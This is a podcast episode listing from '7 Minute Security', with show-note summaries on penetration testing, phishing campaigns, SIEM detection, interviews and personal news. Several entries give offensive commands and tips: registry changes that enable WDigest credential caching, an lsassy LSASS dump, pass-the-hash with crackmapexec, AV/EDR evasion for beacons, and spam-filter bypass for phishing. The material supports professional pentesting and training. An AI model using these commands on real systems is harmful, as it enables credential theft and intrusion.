Hey friends, today we're talking about how to monitor all your cloud thingies (Web servers, mail servers, etc.) with UptimeRobot . And I'm sharing some fun tips to monitor your internal thingies as well - without the use of any extra agent software.A few tips:If you...
- I took a concealed carry course
- I went flying with my boys
- Willy's Wonderland is mindless, popcorn-munching fun, but Pig and The Card Counter are outstanding!
View this episode's show notes for more information
Published: Wednesday, January 12, 2022
Today's episode is all about Brute Ratel , a command and control center that is super cool, quick to setup, and much easier to use (IMHO) than Cobalt Strike. I also talk specifically about some of my favorite command line features, how slick and simple lateral movement...
View this episode's show notes for more information
Published: Wednesday, January 05, 2022
Happy new year friends! Today I share the good, bad, ugly, and BROKEN things I've come across while migrating our Light Pentest LITE training lab from on-prem VMware ESXi to Azure. It has been a fun and frustrating process, but my hope is that some of the...
- No longer relying on a single point of failure (Intel NUC, switch, ISP, etc.)
- You can schedule VMs to auto-shutdown at a certain time each day, and even have Azure send you a notification before the shutdown so you can delay - or suspend altogether - the operation
- VMs are by default (I believe) joined to Azure AD, which I don't want. Here's how I got machines unjoined from Azure AD and then joined to my pwn.town domain:
- Accidentally provision a VM in the wrong subnet? The fix may be rebuilding the flippin' VM (more info in today's episode).
- Just about every operation takes for freakin' ever. And it's confusing because if you delete objects out of the portal, sometimes they don't actually disappear from the GUI for like 5-30 minutes.
- Using backups and snapshots is archaic. You can take a snapshot in the GUI or PowerShell easy-peasy, but if you actually want to restore those snapshots you have to convert them to managed disks, then detach a VM's existing disk, and attach the freshly converted managed disks. This is a nightmare to do with PowerShell.
- Deleting data is a headache. I understand Azure is probably trying to protect you against deleting stuff and not being able to get it back, but they night a right-click > "I know what I'm doing, DELETE THIS NOW" option. Otherwise you can end up in situations where in order to delete data, you have to disable soft delete, undelete deleted data, then re-delete it to actually make it go away. WTH, you say? This doc will help it make more sense (or not).
- Promiscuous mode - just plain does not work as far as I can tell. So I can't do protocol poisoning exercises with something like Inveigh .
- Hashcat - I got CPU-based cracking working in ESXi by installing OpenCL drivers, but try as I may, I cannot get this working in Azure. I even submitted an issue to the hashcat forums but so far no replies.
View this episode's show notes for more information
Published: Thursday, December 30, 2021
Today's episode is brought to us by Manscaped . Get 20% off your order + free shipping with the code 7MS at Manscaped.com Today we're closing down 2021 with a tale of pentest pwnage - this time with a path to DA I had never had a chance to abuse...
View this episode's show notes for more information
Published: Wednesday, December 22, 2021
HAPPY 500 EPISODES, FRIENDS! That's right, 7MS turned 5-0-0 today, and so we asked John Strand of Black Hills Information Security to join us and talk about all things security, including the John/BHIS superhero origin story, the future of pentesting, the...
View this episode's show notes for more information
Published: Thursday, December 16, 2021
Today we have some cool updates on this SIEM-focused series we've been doing for a while. Specifically, I want to share that one of these solutions can now detect three early (and important!) warning signs that bad things are happening in your environment:.
- ASREPRoasting
- WDigest flag getting flipped (reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1)
- Restricted admin mode getting enabled (reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f) - see n00py's blog for more info
View this episode's show notes for more information
Published: Wednesday, December 15, 2021
Hi everybody, today we're continuing a series we started way back in June called Securing Your Mental Health . Today I talk about some easy and relatively cheap things I'm doing to try and shutdown negative thoughts, punch imposter syndrome...
View this episode's show notes for more information
Published: Thursday, December 02, 2021
Hey friends, today I'm giving you a peek behind the curtain of our Light Pentest LITE training to talk about the software/hardware we use to make it sing, the growing pains - and OMG(!) moments - that forced us to build in more infrastructure redundancy,...
View this episode's show notes for more information
Published: Wednesday, November 24, 2021
Today's episode is brought to us by Manscaped . Get 20% off your order + free shipping with the code 7MS at Manscaped.com Today's tale of pentesting has a bunch of tips to help you maximize your pwnage, including:I close out today's episode with a...
- The new Responder DHCP poisoning module
- All the cool bells and whistles from CrackMapExec which now include new lsass-dumping modules !
- Speaking of lsass dumping, here's a new trick that works if you have Visual Studio installed (I bet it will be detected soon).
View this episode's show notes for more information
Published: Wednesday, November 17, 2021
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we continue our...
- RDP from public IPs
- Password spraying
- Kerberoasting
- Mimikatz
- Recon net commands
- Hash dumping
- Hits on a "honey domain admin" account
- Users with non-expiring passwords
- Hits on the SSH/FTP/HTTP honeypot
View this episode's show notes for more information
Published: Wednesday, November 10, 2021
Today we chat with Josh Burnham, Security Operations Manager at Liquid Web . As someone who helps support and secure a hosted environment, Josh sleeps with one eye open...
- How security in a hosting environment has changed from "back in the day" to today
- Tips for running a successful bug bounty program
- Why your organization might want to utilize a security.txt file
- Tips on dealing with the grind of an information security career and how to stay mentally/physically
- Things to NOT assume when migrating servers and services to a hosting provider
- How you shouldn't be afraid of mistakes (but should try your best to make informed, educated ones :-). Jayson Street has some great stories in this vein!
- The importance of backups, and why "The condition of any backup is unknown until a restore is attempted." - Schrödinger’s Backup
View this episode's show notes for more information
Published: Tuesday, November 09, 2021
Hey, remember back in episode #357 where we introduced 7MOIST (7 Minutes of IT and Security Tips)? Yeah, me neither :-). Anyway, we're back with the second edition of 7MOIST and have some cool pentesting and general IT tips that will...
- Stuck on a pentest because EDR keeps gobbling your payloads? SharpCradle might just save the day!
- CrackMapExec continues to learn new awesome tricks - including a module called slinky that plants hash-grabbing files on shares you have write access to!
- Browsing 17 folders deep in Windows Explorer and wish you could just pop a cmd.exe from right there? You can! Just click into the path where you're browsing, type cmd.exe, hit Enter and BOOM! Welcome to a prompt right at that folder!
View this episode's show notes for more information
Published: Thursday, October 28, 2021
Hello friends! We're long overdue for a tale of pentest pwnage, and this one is a humdinger! It's actually kind of three tales in one, focusing on pentesting wins using:.
- Manual "open heart surgery" on the root of the Active Directory domain
- The new totally rad DHCP poisoning module of Responder
- An opportunity to abuse GPOs with SharpGPOAbuse (P.S. we talked about this tool about a year ago in episode 441 )
View this episode's show notes for more information
Published: Wednesday, October 20, 2021
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we're joined by...
- History on cyber insurance - who's buying it, what it does and doesn't cover, and when it started to be something you didn't want to leave home without
- What are insurance companies asking/demanding of customers before writing a cyber insurance policy?
- What basic things organizations can do to reduce malware/ransomware incidents (whether they are considering a cyber insurance policy or not)?
- How do I evaluate the various insurance carriers out there and pick a good one?
View this episode's show notes for more information
Published: Wednesday, October 13, 2021
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Hey friends! Today we're going to recap...
View this episode's show notes for more information
Published: Wednesday, October 06, 2021
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we're talking...
- Kerberoastable and ASREPRoastable users
- Plain text passwords lingering in Group Policy Objects
- Users with never-expiring passwords
- Non-supported versions of Windows
- Machines configured with unconstrained delegation
- Attack and escalation paths to Domain Admins
View this episode's show notes for more information
Published: Wednesday, September 29, 2021
Today we continue our series focused on building a security consultancy and talk about:.
- A phishing campaign that went off the rails, and lessons learned from it
- First impressions of an awesome tool to help add MFA to your Active Directory (not a sponsor)
- A tangent story about how my wife brought some thieves to justice!
View this episode's show notes for more information
Published: Tuesday, September 28, 2021
Hey friends! Today I've got some exciting personal/professional news to share: our Light Pentest eBook - which is a practical, step-by-step playbook for internal network penetration testing - is now available for purchase!Note: this eBook and the [Light...
- Grabbing and analyzing packet captures
- Abusing insecure network protocols
- Exploiting (the lack of) SMB signing
- Capturing, cracking and passing hashes
- Locating high-value targets with DNS zone transfers
- Exploiting vulnerable Group Policy Objects
- Scraping screenshots of Web interfaces with WitnessMe
- Finding and cracking "Kerberoastable" and "ASREPRoastable" Active Directory accounts
- Dumping, passing and cracking hashes from domain controllers
View this episode's show notes for more information
Published: Wednesday, September 22, 2021
Today our good buddy Joe Skeen and I virtually sit down with Matt Quammen of Blue Team Alpha to talk about all things incident response!...
- Top 5 things to do and not do during ransomware event
- Challenges when responding to ransomware events
- Opportunities to break into infosec/IR
- The value of tabletop exercises, and some great ideas for conducting your own
- Incident response stress and success stories
- Cyber insurance - worth it or not?
View this episode's show notes for more information
Published: Wednesday, September 15, 2021
Today our friend Christopher Fielder from Arctic Wolf is back for an interview four-peat! We had a great chat about making sense of vendor alphabet soup terms (like SIEM, SOC, EDR/MDR/XDR, ML, AI and more!), optimizing your SOC to "see" as much as possible, tackling...
View this episode's show notes for more information
Published: Wednesday, September 08, 2021
This episode of 7 Minute Security is sponsored by Datadog. Now offering Cloud Security Posture Management (CPSM), Datadog provides one-click compliance posture. Built on the unified Datadog Agent and platform-wide cloud integrations, you can easily get set up minutes. Try it for yourself today...
- Simple pricing model
- Easy to use dashboard
- Cool "marketplace" of integrations you can add to your instance and start getting alerts for
- Nice API integration that seemed pretty simple to use - and that covers a lot of different cloud products and services
- Ticket dashboard looked straightfoward to use and interpret
- Can quickly add IPs/subnets that you don't want to monitor, if appropriate
View this episode's show notes for more information
Published: Wednesday, September 01, 2021
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today we continue our series we started...
View this episode's show notes for more information
Published: Friday, August 27, 2021
Today we're continuing our discussion on phishing campaigns - including a technical "gotcha" that might redirect your phishing emails into a digital black hole if you're not careful!As I mentioned last week, I've been heavy into spinning up and tearing down phishing campaigns, so I finally got...
- Mail flow > Message Trace > Start a trace then make the Sender field be the user you're sending phishing emails from. That showed me that my phishes were being quarantined!
- Apply this rule if > The sender's domain is > yourphishingdomain.com
- Set the spam confidence level (SCL) to...Bypass spam filtering
- Modify the message properties...set a message header...X-MS-Exchange-Organization-BypassClutter
View this episode's show notes for more information
Published: Thursday, August 19, 2021
Today we're revisiting how to make a kick-butt cred-capturing phishing campaign with Gophish , Amazon Lightsail , LetsEncrypt , ExpiredDomains.net and a special little...
- After domain registration, log into admin.google.com or click Manage Workspace button at checkout.
- At the next screen click Workspace Admin Console. Sign in with the person you’ll be spoofing from, and the temporary password emailed to your backup email account during checkout.
- In the search bar search for Less Secure Apps, choose Allow users to manage their access to less secure apps.
- Now, in the upper right, hit Manage Your Google Account.
- Under Security, click Protect your account and click Add phone number. Finish that process, then click Continue to your Google account.
- Back at the main admin page, under Less secure app access, click Turn on access (not recommended).
- At the next screen click Allow less secure apps: ON
- Back at the main screen, click 2-Step Verification and set it to On.
- Back at the main screen again, a new option called App passwords should be there. Click it. Choose to generate a custom name like LOL and then then an app password will appear. Write it down as it only appears once!
View this episode's show notes for more information
Published: Thursday, August 12, 2021
This episode of 7 Minute Security is sponsored by Datadog. Now offering Cloud Security Posture Management (CPSM), Datadog provides one-click compliance posture. Built on the unified Datadog Agent and platform-wide cloud integrations, you can easily get set up minutes. Try it for yourself today...
View this episode's show notes for more information
Published: Friday, August 06, 2021
Hey friends, today we're talking about a new security training offering 7MinSec has created called Light Pentest LITE - Live Interactive Training Experience . It's a 3-day course (with each class session being 3 hours long) consisting of live (via Zoom),...
View this episode's show notes for more information
Published: Thursday, July 29, 2021
This episode of 7 Minute Security is sponsored by Datadog. Now offering Cloud Security Posture Management (CPSM), Datadog provides one-click compliance posture. Built on the unified Datadog Agent and platform-wide cloud integrations, you can easily get set up minutes. Try it for yourself today...
- Do a straight-up hashcat crack against the PwnedPasswords list (at time of this writing I don't have a good source for the cracked versions of these passwords. I used to grab them at hashes.org. Anybody got an alternative?
- Do a straight-up hashcat crack through the RockYou2021 list
- Run the hatecrack methodology, including the quick crack, the quick crack with rules (I'm partial to OneRuleToRuleThemAll ), and brute-forcing all 1-8 character passwords
View this episode's show notes for more information
Published: Wednesday, July 21, 2021
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we're talking...
- Wherever you spin up your CS instance, it's probably a good idea to lock down the firewall to only specific IPs. With Digital Ocean, I found this article helpful.
- When generating CS listeners, the C2Concealer from FortyNorth helped me get malleable C2 profiles generated while creating a LetsEncrypt cert at the same time!
- My CS beacons kept getting gobbled by AV, but the following resources helped me get some stealthy ones generated: Artifact Kit , PEzor and ScareCrow . Here's a specific ScareCrow example that flew under the EDR radar:
- PowerUpSQL is awesome for finding servers where you can run stored procedures to send your attacking box a priv'd hash to pass/capture/crack. Check out this presentation on PowerUpSQL to find vulnerable targets, then use mssql_ntlm_stealer module in Metasploit to have fun with the account hashes. Be sure to set your domain when configuring the Metasploit module!
- When trying to pop an SMB shell with relay tools, I've had problems recently with those attempts being stopped by defensive tools. Then I found this gem which talks about tweaking smbexec.py to evade AV. It worked a treat!
- When you use MultiRelay , I had no idea that it includes an upload function so you can simply upload your beacon.exe from a SYSTEM shell and fire it right from a command line. Cool!
- Once my beacons started firing around the pentest environment, I temporarily allowed all IPs to talk to my Digital Ocean box - just because the IP I grabbed from a "what is my IP?" Google search didn't always match the actual beacons that called home. Once the beacon connectivity was established, I tweaked the beacon firewall rules to just let certain IPs in the door.
- This Cobalt Strike Extension Kit was FREAKING sweet for adding "right click > do awesome stuff" functionality to CS like dump hashes, search for Kerberoastable accounts, setup persistence, etc.
- Got a SYSTEM level shell but need to abuse a DA's privs? Tell the beacon to pull back a list of running processes, then click one (like explorer.exe) running under a DA's account and then impersonate it to add your account to the DA group!
- Having issues dumping LSASS? This article from Red Canary gives you some great ideas to do it in a way that doesn't make AV throw a fit!
- Trying to RDP using PtH? This article will help you out. And if you get warnings about not being able to RDP in because of some sort of login restriction, try adjusting this reg key with CME:
View this episode's show notes for more information
Published: Friday, July 16, 2021
This episode of 7 Minute Security is sponsored by Datadog. Now offering Cloud Security Posture Management (CPSM), Datadog provides one-click compliance posture. Built on the unified Datadog Agent and platform-wide cloud integrations, you can easily get set up minutes. Try it for yourself today...
View this episode's show notes for more information
Published: Thursday, July 08, 2021
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Yeahhhhhh! Today's another fun tale of...
- The importance of starting your pentest with an AD account that actually has access to...ya know...stuff
- The importance of starting your pentest plugged into a network that actually has...you know...systems connected to it!
- This BHIS article is awesome for finding treasures in SMB shares
- PowerUpSQL audits are a powerful way to get pwnage on a pentest - check out this presentation for some practical how-to advice
- IPMI/BMCs often have weak creds and/or auth bypasses so don't forget to check for them. Rapid7 has a slick blog on the topic.
- Don't forget to check for vulnerable VMWare versions because some of them have major vulnerabilities
View this episode's show notes for more information
Published: Wednesday, June 30, 2021
Hey friends! Today we're dusting off an old mini-series about password cracking in the cloud (check out part 1 and part 2 ) and sharing some awesome info on building a...
- 100 LM hashes discovered, all cracked in 7 minutes (heh, 7 minutes :-)
- Ran hatecrack's quick crackw ith no rules: done in 7 minutes, cracked 108 accounts
- Quick crack against one rule to rule them all : ran in 25 minutes, got got 271 new passwords
- Ran extensive hatecrack methodology, it ran for a little over 2 hours and got 88 new passwords.
- Last Comic Standing was the show I couldn't think of during the episode :-)
- After a toxic non-toxic foam pit incident a few years ago, my family and I had another injury this weekend with a rented waterslide - the fun ended in a concussion!
View this episode's show notes for more information
Published: Thursday, June 24, 2021
Hey everybody! Today Joe and I sat down with Nikhil Mittal of Pentester Academy and Altered Security to talk about a whole slew of fun security topics:.
- How Nikhil first got involved in Pentester Academy
- Nikhil's hacker origin story
- How does Nikhil feel about his tools being used by baddies?
- What security tools/defenses would be good for SMBs to focus on?
- Active Directory security - is all hope lost?
- Will AI, ML, Terminator robots, etc. replace all of us who do pentesting for a living?
View this episode's show notes for more information
Published: Wednesday, June 16, 2021
Today our good pal Christopher Fielder from Arctic Wolf is back for an interview three-peat! He joins Joe "The Machine" Skeen (a.k.a. Gh0sthax ) and I to talk about all things ransomware, including:.
- How the Colonial Pipeline incident may have started from a weak VPN cred with no MFA . Silver lining (?) - they got some of the $ back .
- Was the federal government's response good enough? What should the government be doing to better handle and manage ransomware?
- Common ways ransomware gets in our environments, and some ways to NOT get ransomware'd:Use 2FA (make sure that all accounts are using it!)Consider having (if possible) your AD user scheme be something like chi-user4920394 instead of Joe.PresidentHave users that haven't logged in for X days get automatically locked outTrain your users - consider Arctic Wolf's managed security awareness offeringDetect early signs of compromise like Kerberoasting Lock down your DNS egress to only specific servers so that it doesn't run "wide open"Leverage good threat intel
- Common ways ransomware gets in our environments, and some ways to NOT get ransomware'd:Use 2FA (make sure that all accounts are using it!)Consider having (if possible) your AD user scheme be something like chi-user4920394 instead of Joe.PresidentHave users that haven't logged in for X days get automatically locked outTrain your users - consider Arctic Wolf's managed security awareness offeringDetect early signs of compromise like Kerberoasting Lock down your DNS egress to only specific servers so that it doesn't run "wide open"Leverage good threat intel
- Use 2FA (make sure that all accounts are using it!)
- Consider having (if possible) your AD user scheme be something like chi-user4920394 instead of Joe.President
- Have users that haven't logged in for X days get automatically locked out
- Train your users - consider Arctic Wolf's managed security awareness offering
- Detect early signs of compromise like Kerberoasting
- Lock down your DNS egress to only specific servers so that it doesn't run "wide open"
- Leverage good threat intel
View this episode's show notes for more information
Published: Wednesday, June 09, 2021
Hey everybody, happy June! Our pal Joe is back to cover some great security stories with us, including:.
- Peloton's leaky API
- Some Colonial Pipeline discussion ( story 1 , story 2 )
- Amazon Sidewalk doesn't really share your Internet connection with neighbors/strangers. The Hacker News article doesn't do an awesome job of clearing that up either.
View this episode's show notes for more information
Published: Wednesday, June 02, 2021
Today we're doing something new - a first impressions episode of Meraki networking gear. Note: this is not a sponsored episode, but rather a follow up to episode #460 where I talked about throwing all my UniFi gear into the...
- Super easy plug-and-play setup
- The mobile app can control just about everything - ports, SSIDs, Internet on/off timers and more!
- Verbose logging
- Top-notch support from experienced technicians
- Cost! Big $$$
- "Cloud only" - can't install this gear in a LAN-only configuration
- Client VPN is a bit clunky to setup
View this episode's show notes for more information
Published: Wednesday, May 26, 2021
Hey friends! Today we're talking with Philippe Humeau, CEO of CrowdSec , which is "an open-source massively multiplayer firewall able to analyze visitor behavior & provide an adapted response to all kinds of attacks. It also leverages the crowd power to generate a global...
- What is CrowdSec?
- What problem does it solve?
- Who are your competitors?
- You're open source...so how do you make $? What's your five-year plan?
- You're dealing with a lot of data and metrics...how are you handling data privacy laws and concerns such as GDPR?
- What if I fall in love with CrowdSec and want to contribute to making it better?
View this episode's show notes for more information
Published: Thursday, May 20, 2021
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we continue the...
- Keeping a log and procedure for sanitizing systems
- Keeping a log and procedure for provisioning systems
- A big "gotcha" to be aware of when using Windows system dropboxes - make sure your Windows user account doesn't expire, because Splashtop doesn't have any way to update it! To prevent this, set the account not to expire:
- If you want more tips on building pentest dropboxes, check out this series
View this episode's show notes for more information
Published: Wednesday, May 12, 2021
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Hey everybody! I stayed in a hotel for...
- Reduce layers of people complexity - don't have 17 of your people on the client intro/pitch call and then ghost them once they actually want to buy something!
- Keep project management just complicated enough - I like project management tools and spreadsheet task-trackers like Smartsheet but I'm trying to let the client lead as far as how much detail they need when tracking their projects. By default, we create a document with a high level map of project milestones, timelines and key contact information. We update that as often as the client likes.
- Personalize responses to Web leads - if you have an info@ or sales@ address for your business, I think you should personalize the response you give folks who write in. They wrote you for a reason! Don't just copy/paste some generic "Hey you wanted info about our company so here it is blah blah blah" response, that doesn't make people feel like you give a rip about their needs. Think of something personal to say in the reply. "Oh, I see you're in Minnesota. I'm a big Twins fan!" Something like that. Simple, easy and personal.
- Don't sign people up for junk without asking - in this episode I give an example of a vendor we looked at (but didn't select) for some services, and the company decided to automatically sign ups up for a bunch of electronic and paper mailings. That's super annoying!
- Don't stink at LinkedIn - in the last episode of this series, I told you about a guy who (to me) wins LinkedIn and the Internet because he sent me a personalized video LinkedIn invitation - it was awesome! Be more like that guy, and less like the mosquitoes who send invites like "Hi, I noticed you're human and figured we should be LinkedIn BFFs" and then sign you up for a non-stop barrage of sales pitches!
- Bug people "just enough" - if you've had an awesome scoping call for a potential project and the client has received and reviewed the SOW, stay in touch with them periodically - even if it feels like you're being ghosted.
View this episode's show notes for more information
Published: Wednesday, May 05, 2021
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Welp, I need another security...
- Courses offered on Saturday (I'm usually pooped for these sessions, but it's easier than taking time during the work week)
- Student portal - and especially the student guide! - is more polished, easy to read, and easy to copy/paste from.
- On Saturdays I'm a sleepy Brian. :-)
- I still wish the course was designed such that we would go through various hands-on-keyboard exercises with the instructor, not just watch.
- Use of Discord as main comms channel - it causes anxiety for me...too many blips and bloops and blurps with all the notifications. It's also frustrating that the instructor takes questions from Discord sometimes without repeating the question, thus making it hard to figure out what everybody was talking about if I watch the Zoom reply.
View this episode's show notes for more information
Published: Wednesday, April 28, 2021
Hey friends! Today Joe "The Machine" Skeen (a.k.a. Gh0sthax ) and I talk about some of our favorite news stories, including:.
- FBI removes hacker back doors
- NSA: 5 security bugs under active nation-state cyberattack
- Ubiquiti is accused of covering up a ‘catastrophic’ data breach — and it’s not denying it . On a side note, enjoy our podcast about how we lost our love for Ubiquiti a while back: 7MS #460: Why I'm Throwing My UniFi Gear Into the Ocean
- Codecov users warned after backdoor discovered in devops tool
View this episode's show notes for more information
Published: Thursday, April 22, 2021
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today our friend...
- When the company has one person in charge of IT/security, how can you start taking security seriously without burning this person out? First, it's probably a good idea to take note of what you have as far as people, tools and technology to help you meet your security goals.
- Early in this process, you should inventory what you have (see CIS controls ) so you know what you need to protect. A few tools to help you get started: Nmap Rumble LanSweeper Witnessme
- Nmap
- Rumble
- LanSweeper
- Witnessme
- As you go about any phase of your security journey, don't ever think "I'm good, I'm secure!"
- Quarterly/yearly vulnerability scans just won't cut it in today's threat landscape - especially your external network. Consider scanning it nightly to catch show-stoppers like Hafnium early)
- Limiting administrative privileges is SUPER important - but don't take our word for it, check out this report from Beyond Trust for some important stats like "...enforcing least privilege and removing admin rights eliminates 56% of critical Microsoft vulnerabilities."
- Install LAPS , because if an attacker gets local admin access everywhere, that's in many ways just as good as Domain Admin!
- Train your users on relevant security topics. Then train them again. Then....again. And after that? Again.
- There are many ways to conduct tabletop exercises. They don't have to be crazy technical. Start with the internal tech teams, practice some scenarios and get everybody loosened up. Then add the executives to those meetings so that everybody is more at ease.
- How do you know when it's time to ask for help from an outside security resource?
- Not sure what kind of shape your company's security posture is in? Check out Arctic Wolf's free security maturity assessment .
View this episode's show notes for more information
Published: Wednesday, April 14, 2021
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!In the last two episodes of this series...
- Sets the timezone with tzutil /s "Central Standard Time"
- Stops the VM from falling asleep with powercfg.exe -change -standby-timeout-ac 0
- Grabs and runs a PS file that does a ton of downloading and unzipping of files with:
- Installs Windows updates with:
- Sets a new name for the machine:
- Does a set of actions depending on the IP range with this code (which sets the IP address to a variable and then does stuff if the machine sits in that subnet):
View this episode's show notes for more information
Published: Wednesday, April 07, 2021
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today we talk through our first...
- 5 seconds go by...
- 5 days go by...
- Deep breath. Tosses doo-dad in a drawer full of past Hak5 doo-dads that didn't work that great.
View this episode's show notes for more information
Published: Wednesday, March 31, 2021
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!OK I probably say this every time, but...
View this episode's show notes for more information
Published: Wednesday, March 24, 2021
Hey friends! Warning: this is not a "typical" 7MS episode where we try hard to deliver some level of security value.Instead, today is a big, fat, crybaby, first-world problems whine-fest about how I used to love my UniFi gear for many years, but then a few weeks ago I hit...
- How I did not pirate Boson NetSim
- How I fell in love with the Edge Router X as an up-and-coming network guru
- The schedule isn't up, but I'm speaking at Secure360 this year!
- My shiny new Dream Machine had a really fun issue where one morning Internet service was dead (even though config hadn't changed in weeks), and restoring the SAME config over the RUNNING config fixed the issue. Whaaahhhh?
- The Dream Machine GUI (at the time) doesn't have all the options one might need to stand up a site to site VPN. Neat.
- After a firmware update, my wifi started going down from 8:00 a.m. - 8:07 a.m. every morning. Were one of you hacking me? WERE ONE OF YOU HACKING ME!
- Once I got a BeaconHD , I got a new fun issue where if you were connected to it and submitted a wifi voucher, the Beacon wouldn't properly recognize it and let you on the Internet until about 5 minutes later. Guests loved that! And by "loved that" I mean "hated that."
- After upgrading UDM firmware again, a new nifty issue popped its head up which broke all my inter-VLAN rules. Yay!
- I threw hundreds of dollars at new UniFi switches and access points to solve all these problems, and everything worked perfectly (until it didn't).
View this episode's show notes for more information
Published: Wednesday, March 17, 2021
This episode of 7 Minute Security is sponsored by Datadog. Accelerate security investigations and break down silos between developers, security, and operations teams by correlating your threats, metrics, traces, and logs all in one place. Try it for yourself and get a free t-shirt at...
- Microsoft Exchange cyber attack - Hacker News has a nice what we know so far story, but things have evolved really fast, so make sure you check Microsoft's primary advisory , the script to run on local servers and newer updates such as the recent one-click remediation for unsupported Exchange versions
- SonicWall zero day - yuck, looks like the SonicWall troubles we talked about recently were a true zero day . In contrast to the Exchange story, it looks like SonicWall's official response offers (frighteningly?) little by way of logs and forensics to tell if you were truly popped. Either way, be sure to patch!
- Hackers attempt to contaminate Florida town's water supply - the story itself is interesting, but the way it got picked up by some outlets seems to send the message of "TeamViewer = bad" but we think the true lessons learned here are:Out of date and/or unsupported OS = badWeak credentials = badConnecting this type of equipment directly to the Internet instead of MFA + VPN = bad
- Out of date and/or unsupported OS = bad
- Weak credentials = bad
- Connecting this type of equipment directly to the Internet instead of MFA + VPN = bad
- Webshell use has doubled since last year - this article brings back some happy/frustrating OSCP experiences. To better protect your org from being pwned with Web shells, check out NSA's list of vulnerabilities commonly exploited to plant web shells
- Some great feedback from the last cyber news episode - a podcast listener offered a different take on the "sudo bug that gives root access story" that we discussed last month.
View this episode's show notes for more information
Published: Thursday, March 11, 2021
Today we're super excited to share a featured interview with Tanya Janca of WeHackPurple !Tanya has been in software development from the moment she was of legal age to work in Canada - beginning by working with some huge companies (Nokia/Adobe) before falling in love...
- How to overcome your fears and present at conferences, write blog posts and even start your own company!
- How to deal with online jackwagons who troll you online and at conferences
- The importance of finding a mentor and mentoring others
- Bob and Alice Learn Application Security - Tanya's book, available on Amazon
- Women of Security (WoSEC)
- We Hack Purple Podcast - weekly podcast with a diverse range of guests from all walks of infosec life
- We Hack Purple Community - "a Canadian company dedicated to helping anyone and everyone create secure software."
- Tanya's music on Spotify
- #CyberMentoringMonday - a hashtag that Tanya and other security professionals monitor to help people connect with cyber mentors
- InsiderPHd - has a safe space for bug bounty hunters to learn and collaborate
- WeAreHackerz - "You are welcome to join WeAreHackerz if you identify as a person of a marginalized gender, including but not limited to non-binary individuals, women (trans and cis), trans men, genderqueer, etc. We welcome members across all nationalities, races, religions, ages, or other characteristics that make each of us unique."
- Security in Color
View this episode's show notes for more information
Published: Thursday, March 04, 2021
This episode of 7 Minute Security is sponsored by Datadog. Accelerate security investigations and break down silos between developers, security, and operations teams by correlating your threats, metrics, traces, and logs all in one place. Try it for yourself and get a free t-shirt at...
- Get a cmd.exe spun up in the context of your AD user account:
- Get-DomainUser -PreAuthNotRequired - find AD users with this flag set...then crack the hash for a (potentially) easy win!
- Get-NetUser -spn - find Kerberoastable accounts...then crack the hash for a (potentially) easy win!
- Find-LocalAdminAccess -Verbose helps you find where your general AD user has local admin access!
- lsassy -d domain.com -u YOUR-USER -p YOUR-PASSWORD victim-server
- crackmapexec smb IP.OF.THE.DOMAINCONTROLLER -u ACCOUNT-YOU-DUMPED -H 'NTLM-HASH-OF-THAT-ACCOUNT-YOU-DUMPED
View this episode's show notes for more information
Published: Thursday, February 25, 2021
This episode of 7 Minute Security is sponsored by Datadog. Accelerate security investigations and break down silos between developers, security, and operations teams by correlating your threats, metrics, traces, and logs all in one place. Try it for yourself and get a free t-shirt at...
- We don't think the training/exam is for beginners, despite how its advertised
- Both the lab PDF and PowerPoint have their own quirks - which may ultimately be teaching us not to be copy-and-paste jockeys, and instead build our own study guides and cheat sheets
- Don't let the training give you the idea that most pentests have a super fast escalation path to DA (ok yes sometimes they do, but usually we spend a LOT of hours working on escalation!)
- Watch the walkthrough videos. We repeat: WATCH THE WALKTHROUGH VIDEOS!
- Although not required, we highly recommend capturing all the flags laid out for you in the lab environment
- Know how to privesc - using multiple tools/methods
- It would be to your advantage to understand how to view/manipulate Active directory information in multiple ways
- You start the exam with no tools. So how will you be ready to upload/download tools into the exam environment so you make the most of your exam time?
- Tool X might give you wrong results - or none at all - in the lab. Do you have a backup tool Y and Z that can serve the same purpose?
- You want to be very good at Kerberos ticket crafting!
